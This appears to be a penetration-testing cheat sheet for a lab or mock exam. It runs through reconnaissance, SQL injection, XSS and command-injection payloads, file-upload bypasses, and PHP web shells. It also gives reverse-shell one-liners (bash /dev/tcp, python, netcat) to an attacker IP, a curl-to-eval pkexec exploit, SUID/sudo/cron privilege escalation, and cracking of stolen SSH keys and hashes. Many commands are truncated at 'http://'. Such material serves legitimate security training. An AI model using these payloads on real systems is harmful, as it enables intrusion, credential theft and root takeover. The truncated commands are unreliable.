ip a
ip a → look at eth0, IP address is there with subnet e.g. 10.10.1.2/24 → get network subnet
nmap
nmap 10.10.1.2/24 → scan network subnet (ignore your own IP and gateway, usually 10.10.1.1)
Mock test: target IP 10.10.1.3, output shows HTTP and SSH ports open
nmap -A
nmap -A 10.10.1.3 → aggressive scan to get all details
masscan
masscan -p1-65535 --rate 1000 10.10.10.0/24 -oL masscan.txt → fast full-port scan across a subnet, output to file
ssh
ssh username@ip_address → SSH into target (you can then run vim)
whois – domain/IP registration info
whois example.com → get registrar, name servers, contact info
dig – DNS lookup
dig example.com ANY +short → all DNS records
Tip: add @8.8.8.8 to use a specific DNS server, -x for reverse lookup
host – simple DNS lookup
host -t mx example.com → MX records
nslookup – interactive DNS client
nslookup -type=txt example.com → TXT records
theHarvester – gather emails, subdomains, people
theHarvester -d example.com -b google -l 500 → search Google for 500 results
sublist3r – subdomain enumeration
sublist3r -d example.com -o subdomains.txt
amass – OWASP Amass deep subdomain enumeration
amass enum -d example.com -o amass.txt
shodan – search engine for internet‑connected devices
shodan host 8.8.8.8 → info on an IP
shodan search "apache"
censys – similar to Shodan (API)
censys ipv4 8.8.8.8
Google Dorks – advanced search operators for OSINT
site:example.com ext:log inurl:admin → find exposed admin logs
intitle:"index of" "parent directory" → find open directory listings
Tip: combine site:, inurl:, intitle:, filetype:, ext: for powerful queries
If HTTP is open (port 80):
Open Firefox and connect to http://10.10.1.3
Directory brute‑force
gobuster dir -u http://
ffuf – fast web fuzzer
ffuf -u http://
curl – transfer data, test endpoints
curl -k -X POST -H "Content-Type: application/json" -d '{"user":"admin"}' https://
Burp Suite – intercepting proxy
Start Burp, configure browser proxy to 127.0.0.1:8080, install CA cert. Use Proxy → Intercept to modify requests.
WPScan – enumerate
wpscan --url http://
WPScan – brute‑force passwords
wpscan --url http://
Nikto
nikto -h http://
Basic usage:
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
Advanced options:
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
Common discovery:
Look for parameters in URLs, POST bodies, cookies, headers. Use Burp Suite Scanner or Intruder. Test with single quote ' and observe errors.
Crack the MD5 hashes of passwords dumped from the ssh_users table (e.g., with John the Ripper or Hashcat).
| Tool/Technique | Description | Example |
|---|---|---|
| Burp Suite Intruder | Set payload positions, load XSS payload list, fuzz all inputs | Load payload list, sniper/ bombardier attack |
| OWASP ZAP | Active scanning for XSS | Right‑click → Attack → Active Scan |
| XSStrike | Advanced XSS scanner | xsstrike -u "http://example.com/search?q=TEST" |
| Reflected XSS | Payload in URL, executed in victim's browser | <script>alert(1)</script> |
| Stored XSS | Payload saved in DB, rendered to all viewers | <img src=x onerror=alert(1)> |
| DOM‑based XSS | Payload executed via JavaScript in the page | #<img src=x onerror=alert(1)> |
| Blind XSS | Payload calls back to your server (e.g., <script src=http://yourserver.com/steal.js>) | Host a logger, wait for request |
| Technique | Description | Example |
|---|---|---|
| Check extensions | Try .php, .php3, .phtml, .php5, .asp, .aspx, .jsp | Upload shell.php |
| Null byte injection | shell.php%00.jpg | Bypass extension check (PHP < 5.3.4) |
| Content‑Type spoofing | Set Content-Type: image/jpeg while sending PHP | Use Burp to modify request |
| Double extension | shell.php.jpg | Some blacklists only check last extension |
| Path traversal in filename | ../../../tmp/shell.php | May write outside upload dir |
| Test | Description | Example |
|---|---|---|
| Simple injection | ; whoami, | whoami, && whoami, || whoami | Input field: ; cat /etc/passwd |
| Blind | Use timing (sleep 5) or output redirection to a file you can read | ; sleep 5 |
| Burp Intruder | Load list of ;, |, &, $(), ` | Sniper attack with command separators |
| Network tools | ping, traceroute, nslookup with injected commands | ; ping -c 4 127.0.0.1 |
If you see PHP code like:
$file = $_GET['file']; include($file);
Enter in browser:
http://
Then brute‑force the password and SSH in.
Sometimes entering admin' # into an admin login username field changes the query to comment out the password → login without password.
Upload a PHP file containing:
<?php echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>"; ?>
After upload, go to:
http://
If FTP is open (port 21):
ftp 10.10.1.3 → try anonymous login: username anonymous, password (leave blank).
sqlmap -u "http://
sqlmap -u "http://
sqlmap -u "http://
Crack the MD5 hashes of passwords dumped from the ssh_users table (e.g., with John the Ripper or Hashcat).
Listener (attacker)
nc -lvnp 4444
PHP shell (if you can upload .php)
Save the following as shell.php (you can also get from https://github.com/pentestmonkey/php-reverse-shell):
<?php
// Set your attacker IP and port here
$ip = '<attacker_ip>';
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
Upload and browse to http://
Stabilising the shell
In the reverse shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Background it: press Ctrl + Z
On your local Kali terminal:
stty raw -echo; fg
(Press Enter twice after this – normal to refresh the prompt)
Inside the reverse shell:
export TERM=xterm
<span style="color:red">cd .ssh</span>
<span style="color:red">cat id_rsa</span>
Copy the entire RSA key (from —BEGIN RSA PRIVATE KEY— to —END RSA PRIVATE KEY—) into a file, e.g. id_rsa.copy.
Then crack with John:
john --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt id_rsa.copy
To show cracked password:
john --show id_rsa.copy
Bruteforce a shadow/file:
john --wordlist=/usr/share/wordlists/metasploit/unix_passwords.txt output.txt
Show cracked passwords:
john --show output.txt
With Hashcat (GPU):
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Start Metasploit console:
msfconsole
Search for WordPress AJAX load more file upload exploit:
search wp_ajax_load_more
Select the exploit (use the number shown or full path):
use exploit/unix/webapp/wp_ajax_load_more_file_upload
Show required options:
show options
Set options (adjust as needed):
set RHOSTS
set RPORT
set LHOST
set WP_USERNAME
set WP_PASSWORD
Before exploiting, log in to the WordPress site manually and confirm the email notification (if any) is correct.
Run the exploit:
exploit
hydra -l username -P /usr/share/wordlists/metasploit/unix_passwords.txt
If gcc is not available, use a pure‑Python exploit (e.g., for CVE‑2021‑4034):
python3 cve-2021-4034.py
Find kernel version + search exploits:
uname -a → searchsploit linux kernel <version>
Find all SUID/SGID binaries:
find / -type f -perm -04000 -ls 2>/dev/null
Check https://gtfobins.org/ for known exploits.
Example – pkexec (CVE‑2021‑4034):
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
Alternative pure‑Python:
python3 /path/to/CVE-2021-4034.py
If a binary like nano has SUID:
1. Create a password hash for "password1" (example):
openssl passwd -1 password1
(outputs something like $1$...$hash)
2. Use nano (SUID) to edit /etc/passwd and replace a user's password field with the hash.
3. Then switch user: su <username> → you now have root.
View system cron:
cat /etc/crontab
List all cron dirs:
ls -la /etc/cron*; ls -la /var/spool/cron/crontabs/*
Common schedules:
- Every minute: * * *
- Every 5 minutes: /5 * * *
- Every hour, on the hour: 0 * * *
- Every day at 2:30 AM: 30 2 * *
- Every weekday at midnight: 0 0 * * 1-5
- Twice daily (noon & midnight): 0 0,12 * * *
If a cron job runs a script you can edit (e.g., /opt/backup.sh), replace its content with a reverse shell or add a line to spawn one, then wait for execution.
Check what you can run as root:
sudo -l
Check env_keep / env_reset:
If env_reset disabled, you may inject LD_PRELOAD.
Examples:
- If you can run sudo apt-get update with a pre‑invoke hook:
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash"
- If you can run sudo time:
sudo time /bin/bash
- If you can run sudo nano:
1. Open nano with sudo.
2. Press Ctrl + R to read a file, then Ctrl + X to exit.
3. At the prompt, type: reset; sh 1>&0 2>&0 and press Enter → you get a root shell.
| Tool | Purpose | Basic Usage |
|---|---|---|
| Metasploit Framework | Exploit development, payloads, post‑exploitation | msfconsole → search <name> → use exploit/<path> → set RHOSTS <IP> → set LHOST <IP> → set LPORT <PORT> → exploit |
| Hashcat | GPU password cracking | hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt |
| John the Ripper | CPU password cracking | john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt |
| SearchSploit | Local ExploitDB search | searchsploit <term> |
| Exploit‑DB | Online exploit repository | https://www.exploit-db.com |
| GitHub | Search for PoCs | git clone https://github.com/<user>/<repo> |
Listener (attacker): nc -lvnp 4444
Bash target: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
Python3 target: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP target: php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat traditional: nc -e /bin/sh 10.0.0.1 4444
Netcat OpenBSD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
<?php system($_GET['cmd']); ?>
<?= system($_GET['cmd']); ?>
<?php passthru($_REQUEST['x']); ?>
<?php eval(base64_decode($_SERVER['HTTP_ACCEPT'])); ?>
Tip: Upload any .php file to web root, browse to it, append ?cmd=ls to execute commands.
| Action | Shortcut |
|---|---|
| Intercept on/off | Ctrl + Shift + I |
| Forward | Enter |
| Drop | Ctrl + L |
| Send to Repeater | Ctrl + R |
| Send to Intruder | Ctrl + I |
| Send to Scanner | Ctrl + U |
| Add to scope (from site map) | Right Click → Add to scope |
| Define scope | Project → Scope |
| Match and replace | Proxy → Options → Match and Replace |
| Goal | Command |
|---|---|
| Spawn a TTY shell | python3 -c 'import pty; pty.spawn("/bin/bash")' |
| Upgrade shell | Ctrl+Z → stty raw -echo; fg → reset |
| Find SUID binaries | find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null |
End of cheat sheet.